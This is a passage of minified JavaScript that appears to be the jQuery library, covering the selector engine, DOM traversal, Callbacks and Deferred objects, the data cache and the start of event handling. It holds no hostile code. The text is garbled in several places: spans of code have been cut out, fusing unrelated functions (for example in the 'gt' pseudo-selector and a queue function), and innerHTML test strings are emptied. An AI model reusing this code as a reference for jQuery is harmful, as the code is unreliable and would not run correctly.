",a.firstChild.className="i",2===a.getElementsByClassName("i").length}),c.getById=ib(function(a){return o.appendChild(a).id=u,!e.getElementsByName||!e.getElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if(typeof b.getElementById!==C&&p){var c=b.getElementById(a);return c&&c.parentNode?[c]:[]}},d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){var c=typeof a.getAttributeNode!==C&&a.getAttributeNode("id");return c&&c.value===b}}),d.find.TAG=c.getElementsByTagName?function(a,b){return typeof b.getElementsByTagName!==C?b.getElementsByTagName(a):void 0}:function(a,b){var c,d=[],e=0,f=b.getElementsByTagName(a);if("*"===a){while(c=f[e++])1===c.nodeType&&d.push(c);return d}return f},d.find.CLASS=c.getElementsByClassName&&function(a,b){return typeof b.getElementsByClassName!==C&&p?b.getElementsByClassName(a):void 0},r=[],q=[],(c.qsa=$.test(e.querySelectorAll))&&(ib(function(a){a.innerHTML="",a.querySelectorAll("[msallowclip^='']").length&&q.push("[*^$]="+M+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+M+"*(?:value|"+L+")"),a.querySelectorAll(":checked").length||q.push(":checked")}),ib(function(a){var b=e.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+M+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push(":enabled",":disabled"),a.querySelectorAll("*,:x"),q.push(",.*:")})),(c.matchesSelector=$.test(s=o.matches||o.webkitMatchesSelector||o.mozMatchesSelector||o.oMatchesSelector||o.msMatchesSelector))&&ib(function(a){c.disconnectedMatch=s.call(a,"div"),s.call(a,"[s!='']:x"),r.push("!=",Q)}),q=q.length&&new RegExp(q.join("|")),r=r.length&&new RegExp(r.join("|")),b=$.test(o.compareDocumentPosition),t=b||$.test(o.contains)?function(a,b){var c=9===a.nodeType?a.documentElement:a,d=b&&b.parentNode;return a===d||!(!d||1!==d.nodeType||!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===e||a.ownerDocument===v&&t(v,a)?-1:b===e||b.ownerDocument===v&&t(v,b)?1:k?K.call(k,a)-K.call(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,f=a.parentNode,g=b.parentNode,h=[a],i=[b];if(!f||!g)return a===e?-1:b===e?1:f?-1:g?1:k?K.call(k,a)-K.call(k,b):0;if(f===g)return kb(a,b);c=a;while(c=c.parentNode)h.unshift(c);c=b;while(c=c.parentNode)i.unshift(c);while(h[d]===i[d])d++;return d?kb(h[d],i[d]):h[d]===v?-1:i[d]===v?1:0},e):n},fb.matches=function(a,b){return fb(a,null,null,b)},fb.matchesSelector=function(a,b){if((a.ownerDocument||a)!==n&&m(a),b=b.replace(U,"='$1']"),!(!c.matchesSelector||!p||r&&r.test(b)||q&&q.test(b)))try{var d=s.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return fb(b,n,null,[a]).length>0},fb.contains=function(a,b){return(a.ownerDocument||a)!==n&&m(a),t(a,b)},fb.attr=function(a,b){(a.ownerDocument||a)!==n&&m(a);var e=d.attrHandle[b.toLowerCase()],f=e&&E.call(d.attrHandle,b.toLowerCase())?e(a,b,!p):void 0;return void 0!==f?f:c.attributes||!p?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},fb.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)},fb.uniqueSort=function(a){var b,d=[],e=0,f=0;if(l=!c.detectDuplicates,k=!c.sortStable&&a.slice(0),a.sort(B),l){while(b=a[f++])b===a[f]&&(e=d.push(f));while(e--)a.splice(d[e],1)}return k=null,a},e=fb.getText=function(a){var b,c="",d=0,f=a.nodeType;if(f){if(1===f||9===f||11===f){if("string"==typeof a.textContent)return a.textContent;for(a=a.firstChild;a;a=a.nextSibling)c+=e(a)}else if(3===f||4===f)return a.nodeValue}else while(b=a[d++])c+=e(b);return c},d=fb.selectors={cacheLength:50,createPseudo:hb,match:X,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(a){return a[1]=a[1].replace(cb,db),a[3]=(a[3]||a[4]||a[5]||"").replace(cb,db),"~="===a[2]&&(a[3]=" "+a[3]+" "),a.slice(0,4)},CHILD:function(a){return a[1]=a[1].toLowerCase(),"nth"===a[1].slice(0,3)?(a[3]||fb.error(a[0]),a[4]=+(a[4]?a[5]+(a[6]||1):2*("even"===a[3]||"odd"===a[3])),a[5]=+(a[7]+a[8]||"odd"===a[3])):a[3]&&fb.error(a[0]),a},PSEUDO:function(a){var b,c=!a[6]&&a[2];return X.CHILD.test(a[0])?null:(a[3]?a[2]=a[4]||a[5]||"":c&&V.test(c)&&(b=g(c,!0))&&(b=c.indexOf(")",c.length-b)-c.length)&&(a[0]=a[0].slice(0,b),a[2]=c.slice(0,b)),a.slice(0,3))}},filter:{TAG:function(a){var b=a.replace(cb,db).toLowerCase();return"*"===a?function(){return!0}:function(a){return a.nodeName&&a.nodeName.toLowerCase()===b}},CLASS:function(a){var b=y[a+" "];return b||(b=new RegExp("(^|"+M+")"+a+"("+M+"|$)"))&&y(a,function(a){return b.test("string"==typeof a.className&&a.className||typeof a.getAttribute!==C&&a.getAttribute("class")||"")})},ATTR:function(a,b,c){return function(d){var e=fb.attr(d,a);return null==e?"!="===b:b?(e+="","="===b?e===c:"!="===b?e!==c:"^="===b?c&&0===e.indexOf(c):"*="===b?c&&e.indexOf(c)>-1:"$="===b?c&&e.slice(-c.length)===c:"~="===b?(" "+e+" ").indexOf(c)>-1:"|="===b?e===c||e.slice(0,c.length+1)===c+"-":!1):!0}},CHILD:function(a,b,c,d,e){var f="nth"!==a.slice(0,3),g="last"!==a.slice(-4),h="of-type"===b;return 1===d&&0===e?function(a){return!!a.parentNode}:function(b,c,i){var j,k,l,m,n,o,p=f!==g?"nextSibling":"previousSibling",q=b.parentNode,r=h&&b.nodeName.toLowerCase(),s=!i&&!h;if(q){if(f){while(p){l=b;while(l=l[p])if(h?l.nodeName.toLowerCase()===r:1===l.nodeType)return!1;o=p="only"===a&&!o&&"nextSibling"}return!0}if(o=[g?q.firstChild:q.lastChild],g&&s){k=q[u]||(q[u]={}),j=k[a]||[],n=j[0]===w&&j[1],m=j[0]===w&&j[2],l=n&&q.childNodes[n];while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if(1===l.nodeType&&++m&&l===b){k[a]=[w,n,m];break}}else if(s&&(j=(b[u]||(b[u]={}))[a])&&j[0]===w)m=j[1];else while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if((h?l.nodeName.toLowerCase()===r:1===l.nodeType)&&++m&&(s&&((l[u]||(l[u]={}))[a]=[w,m]),l===b))break;return m-=e,m===d||m%d===0&&m/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||fb.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?hb(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=K.call(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudos:{not:hb(function(a){var b=[],c=[],d=h(a.replace(R,"$1"));return d[u]?hb(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),!c.pop()}}),has:hb(function(a){return function(b){return fb(a,b).length>0}}),contains:hb(function(a){return function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:hb(function(a){return W.test(a||"")||fb.error("unsupported lang: "+a),a=a.replace(cb,db).toLowerCase(),function(b){var c;do if(c=p?b.lang:b.getAttribute("xml:lang")||b.getAttribute("lang"))return c=c.toLowerCase(),c===a||0===c.indexOf(a+"-");while((b=b.parentNode)&&1===b.nodeType);return!1}}),target:function(b){var c=a.location&&a.location.hash;return c&&c.slice(1)===b.id},root:function(a){return a===o},focus:function(a){return a===n.activeElement&&(!n.hasFocus||n.hasFocus())&&!!(a.type||a.href||~a.tabIndex)},enabled:function(a){return a.disabled===!1},disabled:function(a){return a.disabled===!0},checked:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&!!a.checked||"option"===b&&!!a.selected},selected:function(a){return a.parentNode&&a.parentNode.selectedIndex,a.selected===!0},empty:function(a){for(a=a.firstChild;a;a=a.nextSibling)if(a.nodeType<6)return!1;return!0},parent:function(a){return!d.pseudos.empty(a)},header:function(a){return Z.test(a.nodeName)},input:function(a){return Y.test(a.nodeName)},button:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&"button"===a.type||"button"===b},text:function(a){var b;return"input"===a.nodeName.toLowerCase()&&"text"===a.type&&(null==(b=a.getAttribute("type"))||"text"===b.toLowerCase())},first:nb(function(){return[0]}),last:nb(function(a,b){return[b-1]}),eq:nb(function(a,b,c){return[0>c?c+b:c]}),even:nb(function(a,b){for(var c=0;b>c;c+=2)a.push(c);return a}),odd:nb(function(a,b){for(var c=1;b>c;c+=2)a.push(c);return a}),lt:nb(function(a,b,c){for(var d=0>c?c+b:c;--d>=0;)a.push(d);return a}),gt:nb(function(a,b,c){for(var d=0>c?c+b:c;++db;b++)d+=a[b].value;return d}function rb(a,b,c){var d=b.dir,e=c&&"parentNode"===d,f=x++;return b.first?function(b,c,f){while(b=b[d])if(1===b.nodeType||e)return a(b,c,f)}:function(b,c,g){var h,i,j=[w,f];if(g){while(b=b[d])if((1===b.nodeType||e)&&a(b,c,g))return!0}else while(b=b[d])if(1===b.nodeType||e){if(i=b[u]||(b[u]={}),(h=i[d])&&h[0]===w&&h[1]===f)return j[2]=h[2];if(i[d]=j,j[2]=a(b,c,g))return!0}}}function sb(a){return a.length>1?function(b,c,d){var e=a.length;while(e--)if(!a[e](b,c,d))return!1;return!0}:a[0]}function tb(a,b,c){for(var d=0,e=b.length;e>d;d++)fb(a,b[d],c);return c}function ub(a,b,c,d,e){for(var f,g=[],h=0,i=a.length,j=null!=b;i>h;h++)(f=a[h])&&(!c||c(f,d,e))&&(g.push(f),j&&b.push(h));return g}function vb(a,b,c,d,e,f){return d&&!d[u]&&(d=vb(d)),e&&!e[u]&&(e=vb(e,f)),hb(function(f,g,h,i){var j,k,l,m=[],n=[],o=g.length,p=f||tb(b||"*",h.nodeType?[h]:h,[]),q=!a||!f&&b?p:ub(p,m,a,h,i),r=c?e||(f?a:o||d)?[]:g:q;if(c&&c(q,r,h,i),d){j=ub(r,n),d(j,[],h,i),k=j.length;while(k--)(l=j[k])&&(r[n[k]]=!(q[n[k]]=l))}if(f){if(e||a){if(e){j=[],k=r.length;while(k--)(l=r[k])&&j.push(q[k]=l);e(null,r=[],j,i)}k=r.length;while(k--)(l=r[k])&&(j=e?K.call(f,l):m[k])>-1&&(f[j]=!(g[j]=l))}}else r=ub(r===g?r.splice(o,r.length):r),e?e(null,g,r,i):I.apply(g,r)})}function wb(a){for(var b,c,e,f=a.length,g=d.relative[a[0].type],h=g||d.relative[" "],i=g?1:0,k=rb(function(a){return a===b},h,!0),l=rb(function(a){return K.call(b,a)>-1},h,!0),m=[function(a,c,d){return!g&&(d||c!==j)||((b=c).nodeType?k(a,c,d):l(a,c,d))}];f>i;i++)if(c=d.relative[a[i].type])m=[rb(sb(m),c)];else{if(c=d.filter[a[i].type].apply(null,a[i].matches),c[u]){for(e=++i;f>e;e++)if(d.relative[a[e].type])break;return vb(i>1&&sb(m),i>1&&qb(a.slice(0,i-1).concat({value:" "===a[i-2].type?"*":""})).replace(R,"$1"),c,e>i&&wb(a.slice(i,e)),f>e&&wb(a=a.slice(e)),f>e&&qb(a))}m.push(c)}return sb(m)}function xb(a,b){var c=b.length>0,e=a.length>0,f=function(f,g,h,i,k){var l,m,o,p=0,q="0",r=f&&[],s=[],t=j,u=f||e&&d.find.TAG("*",k),v=w+=null==t?1:Math.random()||.1,x=u.length;for(k&&(j=g!==n&&g);q!==x&&null!=(l=u[q]);q++){if(e&&l){m=0;while(o=a[m++])if(o(l,g,h)){i.push(l);break}k&&(w=v)}c&&((l=!o&&l)&&p--,f&&r.push(l))}if(p+=q,c&&q!==p){m=0;while(o=b[m++])o(r,s,g,h);if(f){if(p>0)while(q--)r[q]||s[q]||(s[q]=G.call(i));s=ub(s)}I.apply(i,s),k&&!f&&s.length>0&&p+b.length>1&&fb.uniqueSort(i)}return k&&(w=v,j=t),r};return c?hb(f):f}return h=fb.compile=function(a,b){var c,d=[],e=[],f=A[a+" "];if(!f){b||(b=g(a)),c=b.length;while(c--)f=wb(b[c]),f[u]?d.push(f):e.push(f);f=A(a,xb(e,d)),f.selector=a}return f},i=fb.select=function(a,b,e,f){var i,j,k,l,m,n="function"==typeof a&&a,o=!f&&g(a=n.selector||a);if(e=e||[],1===o.length){if(j=o[0]=o[0].slice(0),j.length>2&&"ID"===(k=j[0]).type&&c.getById&&9===b.nodeType&&p&&d.relative[j[1].type]){if(b=(d.find.ID(k.matches[0].replace(cb,db),b)||[])[0],!b)return e;n&&(b=b.parentNode),a=a.slice(j.shift().value.length)}i=X.needsContext.test(a)?0:j.length;while(i--){if(k=j[i],d.relative[l=k.type])break;if((m=d.find[l])&&(f=m(k.matches[0].replace(cb,db),ab.test(j[0].type)&&ob(b.parentNode)||b))){if(j.splice(i,1),a=f.length&&qb(j),!a)return I.apply(e,f),e;break}}}return(n||h(a,o))(f,b,!p,e,ab.test(a)&&ob(b.parentNode)||b),e},c.sortStable=u.split("").sort(B).join("")===u,c.detectDuplicates=!!l,m(),c.sortDetached=ib(function(a){return 1&a.compareDocumentPosition(n.createElement("div"))}),ib(function(a){return a.innerHTML="","#"===a.firstChild.getAttribute("href")})||jb("type|href|height|width",function(a,b,c){return c?void 0:a.getAttribute(b,"type"===b.toLowerCase()?1:2)}),c.attributes&&ib(function(a){return a.innerHTML="",a.firstChild.setAttribute("value",""),""===a.firstChild.getAttribute("value")})||jb("value",function(a,b,c){return c||"input"!==a.nodeName.toLowerCase()?void 0:a.defaultValue}),ib(function(a){return null==a.getAttribute("disabled")})||jb(L,function(a,b,c){var d;return c?void 0:a[b]===!0?b.toLowerCase():(d=a.getAttributeNode(b))&&d.specified?d.value:null}),fb}(a);m.find=s,m.expr=s.selectors,m.expr[":"]=m.expr.pseudos,m.unique=s.uniqueSort,m.text=s.getText,m.isXMLDoc=s.isXML,m.contains=s.contains;var t=m.expr.match.needsContext,u=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,v=/^.[^:#\[\.,]*$/;function w(a,b,c){if(m.isFunction(b))return m.grep(a,function(a,d){return!!b.call(a,d,a)!==c});if(b.nodeType)return m.grep(a,function(a){return a===b!==c});if("string"==typeof b){if(v.test(b))return m.filter(b,a,c);b=m.filter(b,a)}return m.grep(a,function(a){return m.inArray(a,b)>=0!==c})}m.filter=function(a,b,c){var d=b[0];return c&&(a=":not("+a+")"),1===b.length&&1===d.nodeType?m.find.matchesSelector(d,a)?[d]:[]:m.find.matches(a,m.grep(b,function(a){return 1===a.nodeType}))},m.fn.extend({find:function(a){var b,c=[],d=this,e=d.length;if("string"!=typeof a)return this.pushStack(m(a).filter(function(){for(b=0;e>b;b++)if(m.contains(d[b],this))return!0}));for(b=0;e>b;b++)m.find(a,d[b],c);return c=this.pushStack(e>1?m.unique(c):c),c.selector=this.selector?this.selector+" "+a:a,c},filter:function(a){return this.pushStack(w(this,a||[],!1))},not:function(a){return this.pushStack(w(this,a||[],!0))},is:function(a){return!!w(this,"string"==typeof a&&t.test(a)?m(a):a||[],!1).length}});var x,y=a.document,z=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,A=m.fn.init=function(a,b){var c,d;if(!a)return this;if("string"==typeof a){if(c="<"===a.charAt(0)&&">"===a.charAt(a.length-1)&&a.length>=3?[null,a,null]:z.exec(a),!c||!c[1]&&b)return!b||b.jquery?(b||x).find(a):this.constructor(b).find(a);if(c[1]){if(b=b instanceof m?b[0]:b,m.merge(this,m.parseHTML(c[1],b&&b.nodeType?b.ownerDocument||b:y,!0)),u.test(c[1])&&m.isPlainObject(b))for(c in b)m.isFunction(this[c])?this[c](b[c]):this.attr(c,b[c]);return this}if(d=y.getElementById(c[2]),d&&d.parentNode){if(d.id!==c[2])return x.find(a);this.length=1,this[0]=d}return this.context=y,this.selector=a,this}return a.nodeType?(this.context=this[0]=a,this.length=1,this):m.isFunction(a)?"undefined"!=typeof x.ready?x.ready(a):a(m):(void 0!==a.selector&&(this.selector=a.selector,this.context=a.context),m.makeArray(a,this))};A.prototype=m.fn,x=m(y);var B=/^(?:parents|prev(?:Until|All))/,C={children:!0,contents:!0,next:!0,prev:!0};m.extend({dir:function(a,b,c){var d=[],e=a[b];while(e&&9!==e.nodeType&&(void 0===c||1!==e.nodeType||!m(e).is(c)))1===e.nodeType&&d.push(e),e=e[b];return d},sibling:function(a,b){for(var c=[];a;a=a.nextSibling)1===a.nodeType&&a!==b&&c.push(a);return c}}),m.fn.extend({has:function(a){var b,c=m(a,this),d=c.length;return this.filter(function(){for(b=0;d>b;b++)if(m.contains(this,c[b]))return!0})},closest:function(a,b){for(var c,d=0,e=this.length,f=[],g=t.test(a)||"string"!=typeof a?m(a,b||this.context):0;e>d;d++)for(c=this[d];c&&c!==b;c=c.parentNode)if(c.nodeType<11&&(g?g.index(c)>-1:1===c.nodeType&&m.find.matchesSelector(c,a))){f.push(c);break}return this.pushStack(f.length>1?m.unique(f):f)},index:function(a){return a?"string"==typeof a?m.inArray(this[0],m(a)):m.inArray(a.jquery?a[0]:a,this):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(a,b){return this.pushStack(m.unique(m.merge(this.get(),m(a,b))))},addBack:function(a){return this.add(null==a?this.prevObject:this.prevObject.filter(a))}});function D(a,b){do a=a[b];while(a&&1!==a.nodeType);return a}m.each({parent:function(a){var b=a.parentNode;return b&&11!==b.nodeType?b:null},parents:function(a){return m.dir(a,"parentNode")},parentsUntil:function(a,b,c){return m.dir(a,"parentNode",c)},next:function(a){return D(a,"nextSibling")},prev:function(a){return D(a,"previousSibling")},nextAll:function(a){return m.dir(a,"nextSibling")},prevAll:function(a){return m.dir(a,"previousSibling")},nextUntil:function(a,b,c){return m.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return m.dir(a,"previousSibling",c)},siblings:function(a){return m.sibling((a.parentNode||{}).firstChild,a)},children:function(a){return m.sibling(a.firstChild)},contents:function(a){return m.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:m.merge([],a.childNodes)}},function(a,b){m.fn[a]=function(c,d){var e=m.map(this,b,c);return"Until"!==a.slice(-5)&&(d=c),d&&"string"==typeof d&&(e=m.filter(d,e)),this.length>1&&(C[a]||(e=m.unique(e)),B.test(a)&&(e=e.reverse())),this.pushStack(e)}});var E=/\S+/g,F={};function G(a){var b=F[a]={};return m.each(a.match(E)||[],function(a,c){b[c]=!0}),b}m.Callbacks=function(a){a="string"==typeof a?F[a]||G(a):m.extend({},a);var b,c,d,e,f,g,h=[],i=!a.once&&[],j=function(l){for(c=a.memory&&l,d=!0,f=g||0,g=0,e=h.length,b=!0;h&&e>f;f++)if(h[f].apply(l[0],l[1])===!1&&a.stopOnFalse){c=!1;break}b=!1,h&&(i?i.length&&j(i.shift()):c?h=[]:k.disable())},k={add:function(){if(h){var d=h.length;!function f(b){m.each(b,function(b,c){var d=m.type(c);"function"===d?a.unique&&k.has(c)||h.push(c):c&&c.length&&"string"!==d&&f(c)})}(arguments),b?e=h.length:c&&(g=d,j(c))}return this},remove:function(){return h&&m.each(arguments,function(a,c){var d;while((d=m.inArray(c,h,d))>-1)h.splice(d,1),b&&(e>=d&&e--,f>=d&&f--)}),this},has:function(a){return a?m.inArray(a,h)>-1:!(!h||!h.length)},empty:function(){return h=[],e=0,this},disable:function(){return h=i=c=void 0,this},disabled:function(){return!h},lock:function(){return i=void 0,c||k.disable(),this},locked:function(){return!i},fireWith:function(a,c){return!h||d&&!i||(c=c||[],c=[a,c.slice?c.slice():c],b?i.push(c):j(c)),this},fire:function(){return k.fireWith(this,arguments),this},fired:function(){return!!d}};return k},m.extend({Deferred:function(a){var b=[["resolve","done",m.Callbacks("once memory"),"resolved"],["reject","fail",m.Callbacks("once memory"),"rejected"],["notify","progress",m.Callbacks("memory")]],c="pending",d={state:function(){return c},always:function(){return e.done(arguments).fail(arguments),this},then:function(){var a=arguments;return m.Deferred(function(c){m.each(b,function(b,f){var g=m.isFunction(a[b])&&a[b];e[f[1]](function(){var a=g&&g.apply(this,arguments);a&&m.isFunction(a.promise)?a.promise().done(c.resolve).fail(c.reject).progress(c.notify):c[f[0]+"With"](this===d?c.promise():this,g?[a]:arguments)})}),a=null}).promise()},promise:function(a){return null!=a?m.extend(a,d):d}},e={};return d.pipe=d.then,m.each(b,function(a,f){var g=f[2],h=f[3];d[f[1]]=g.add,h&&g.add(function(){c=h},b[1^a][2].disable,b[2][2].lock),e[f[0]]=function(){return e[f[0]+"With"](this===e?d:this,arguments),this},e[f[0]+"With"]=g.fireWith}),d.promise(e),a&&a.call(e,e),e},when:function(a){var b=0,c=d.call(arguments),e=c.length,f=1!==e||a&&m.isFunction(a.promise)?e:0,g=1===f?a:m.Deferred(),h=function(a,b,c){return function(e){b[a]=this,c[a]=arguments.length>1?d.call(arguments):e,c===i?g.notifyWith(b,c):--f||g.resolveWith(b,c)}},i,j,k;if(e>1)for(i=new Array(e),j=new Array(e),k=new Array(e);e>b;b++)c[b]&&m.isFunction(c[b].promise)?c[b].promise().done(h(b,k,c)).fail(g.reject).progress(h(b,j,i)):--f;return f||g.resolveWith(k,c),g.promise()}});var H;m.fn.ready=function(a){return m.ready.promise().done(a),this},m.extend({isReady:!1,readyWait:1,holdReady:function(a){a?m.readyWait++:m.ready(!0)},ready:function(a){if(a===!0?!--m.readyWait:!m.isReady){if(!y.body)return setTimeout(m.ready);m.isReady=!0,a!==!0&&--m.readyWait>0||(H.resolveWith(y,[m]),m.fn.triggerHandler&&(m(y).triggerHandler("ready"),m(y).off("ready")))}}});function I(){y.addEventListener?(y.removeEventListener("DOMContentLoaded",J,!1),a.removeEventListener("load",J,!1)):(y.detachEvent("onreadystatechange",J),a.detachEvent("onload",J))}function J(){(y.addEventListener||"load"===event.type||"complete"===y.readyState)&&(I(),m.ready())}m.ready.promise=function(b){if(!H)if(H=m.Deferred(),"complete"===y.readyState)setTimeout(m.ready);else if(y.addEventListener)y.addEventListener("DOMContentLoaded",J,!1),a.addEventListener("load",J,!1);else{y.attachEvent("onreadystatechange",J),a.attachEvent("onload",J);var c=!1;try{c=null==a.frameElement&&y.documentElement}catch(d){}c&&c.doScroll&&!function e(){if(!m.isReady){try{c.doScroll("left")}catch(a){return setTimeout(e,50)}I(),m.ready()}}()}return H.promise(b)};var K="undefined",L;for(L in m(k))break;k.ownLast="0"!==L,k.inlineBlockNeedsLayout=!1,m(function(){var a,b,c,d;c=y.getElementsByTagName("body")[0],c&&c.style&&(b=y.createElement("div"),d=y.createElement("div"),d.style.cssText="position:absolute;border:0;width:0;height:0;top:0;left:-9999px",c.appendChild(d).appendChild(b),typeof b.style.zoom!==K&&(b.style.cssText="display:inline;margin:0;border:0;padding:1px;width:1px;zoom:1",k.inlineBlockNeedsLayout=a=3===b.offsetWidth,a&&(c.style.zoom=1)),c.removeChild(d))}),function(){var a=y.createElement("div");if(null==k.deleteExpando){k.deleteExpando=!0;try{delete a.test}catch(b){k.deleteExpando=!1}}a=null}(),m.acceptData=function(a){var b=m.noData[(a.nodeName+" ").toLowerCase()],c=+a.nodeType||1;return 1!==c&&9!==c?!1:!b||b!==!0&&a.getAttribute("classid")===b};var M=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,N=/([A-Z])/g;function O(a,b,c){if(void 0===c&&1===a.nodeType){var d="data-"+b.replace(N,"-$1").toLowerCase();if(c=a.getAttribute(d),"string"==typeof c){try{c="true"===c?!0:"false"===c?!1:"null"===c?null:+c+""===c?+c:M.test(c)?m.parseJSON(c):c}catch(e){}m.data(a,b,c)}else c=void 0}return c}function P(a){var b;for(b in a)if(("data"!==b||!m.isEmptyObject(a[b]))&&"toJSON"!==b)return!1;return!0}function Q(a,b,d,e){if(m.acceptData(a)){var f,g,h=m.expando,i=a.nodeType,j=i?m.cache:a,k=i?a[h]:a[h]&&h; + if(k&&j[k]&&(e||j[k].data)||void 0!==d||"string"!=typeof b)return k||(k=i?a[h]=c.pop()||m.guid++:h),j[k]||(j[k]=i?{}:{toJSON:m.noop}),("object"==typeof b||"function"==typeof b)&&(e?j[k]=m.extend(j[k],b):j[k].data=m.extend(j[k].data,b)),g=j[k],e||(g.data||(g.data={}),g=g.data),void 0!==d&&(g[m.camelCase(b)]=d),"string"==typeof b?(f=g[b],null==f&&(f=g[m.camelCase(b)])):f=g,f}}function R(a,b,c){if(m.acceptData(a)){var d,e,f=a.nodeType,g=f?m.cache:a,h=f?a[m.expando]:m.expando;if(g[h]){if(b&&(d=c?g[h]:g[h].data)){m.isArray(b)?b=b.concat(m.map(b,m.camelCase)):b in d?b=[b]:(b=m.camelCase(b),b=b in d?[b]:b.split(" ")),e=b.length;while(e--)delete d[b[e]];if(c?!P(d):!m.isEmptyObject(d))return}(c||(delete g[h].data,P(g[h])))&&(f?m.cleanData([a],!0):k.deleteExpando||g!=g.window?delete g[h]:g[h]=null)}}}m.extend({cache:{},noData:{"applet ":!0,"embed ":!0,"object ":"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"},hasData:function(a){return a=a.nodeType?m.cache[a[m.expando]]:a[m.expando],!!a&&!P(a)},data:function(a,b,c){return Q(a,b,c)},removeData:function(a,b){return R(a,b)},_data:function(a,b,c){return Q(a,b,c,!0)},_removeData:function(a,b){return R(a,b,!0)}}),m.fn.extend({data:function(a,b){var c,d,e,f=this[0],g=f&&f.attributes;if(void 0===a){if(this.length&&(e=m.data(f),1===f.nodeType&&!m._data(f,"parsedAttrs"))){c=g.length;while(c--)g[c]&&(d=g[c].name,0===d.indexOf("data-")&&(d=m.camelCase(d.slice(5)),O(f,d,e[d])));m._data(f,"parsedAttrs",!0)}return e}return"object"==typeof a?this.each(function(){m.data(this,a)}):arguments.length>1?this.each(function(){m.data(this,a,b)}):f?O(f,a,m.data(f,a)):void 0},removeData:function(a){return this.each(function(){m.removeData(this,a)})}}),m.extend({queue:function(a,b,c){var d;return a?(b=(b||"fx")+"queue",d=m._data(a,b),c&&(!d||m.isArray(c)?d=m._data(a,b,m.makeArray(c)):d.push(c)),d||[]):void 0},dequeue:function(a,b){b=b||"fx";var c=m.queue(a,b),d=c.length,e=c.shift(),f=m._queueHooks(a,b),g=function(){m.dequeue(a,b)};"inprogress"===e&&(e=c.shift(),d--),e&&("fx"===b&&c.unshift("inprogress"),delete f.stop,e.call(a,g,f)),!d&&f&&f.empty.fire()},_queueHooks:function(a,b){var c=b+"queueHooks";return m._data(a,c)||m._data(a,c,{empty:m.Callbacks("once memory").add(function(){m._removeData(a,b+"queue"),m._removeData(a,c)})})}}),m.fn.extend({queue:function(a,b){var c=2;return"string"!=typeof a&&(b=a,a="fx",c--),arguments.lengthh;h++)b(a[h],c,g?d:d.call(a[h],h,b(a[h],c)));return e?a:j?b.call(a):i?b(a[0],c):f},W=/^(?:checkbox|radio)$/i;!function(){var a=y.createElement("input"),b=y.createElement("div"),c=y.createDocumentFragment();if(b.innerHTML="
a",k.leadingWhitespace=3===b.firstChild.nodeType,k.tbody=!b.getElementsByTagName("tbody").length,k.htmlSerialize=!!b.getElementsByTagName("link").length,k.html5Clone="<:nav>"!==y.createElement("nav").cloneNode(!0).outerHTML,a.type="checkbox",a.checked=!0,c.appendChild(a),k.appendChecked=a.checked,b.innerHTML="",k.noCloneChecked=!!b.cloneNode(!0).lastChild.defaultValue,c.appendChild(b),b.innerHTML="",k.checkClone=b.cloneNode(!0).cloneNode(!0).lastChild.checked,k.noCloneEvent=!0,b.attachEvent&&(b.attachEvent("onclick",function(){k.noCloneEvent=!1}),b.cloneNode(!0).click()),null==k.deleteExpando){k.deleteExpando=!0;try{delete b.test}catch(d){k.deleteExpando=!1}}}(),function(){var b,c,d=y.createElement("div");for(b in{submit:!0,change:!0,focusin:!0})c="on"+b,(k[b+"Bubbles"]=c in a)||(d.setAttribute(c,"t"),k[b+"Bubbles"]=d.attributes[c].expando===!1);d=null}();var X=/^(?:input|select|textarea)$/i,Y=/^key/,Z=/^(?:mouse|pointer|contextmenu)|click/,$=/^(?:focusinfocus|focusoutblur)$/,_=/^([^.]*)(?:\.(.+)|)$/;function ab(){return!0}function bb(){return!1}function cb(){try{return y.activeElement}catch(a){}}m.event={global:{},add:function(a,b,c,d,e){var f,g,h,i,j,k,l,n,o,p,q,r=m._data(a);if(r){c.handler&&(i=c,c=i.handler,e=i.selector),c.guid||(c.guid=m.guid++),(g=r.events)||(g=r.events={}),(k=r.handle)||(k=r.handle=function(a){return typeof m===K||a&&m.event.triggered===a.type?void 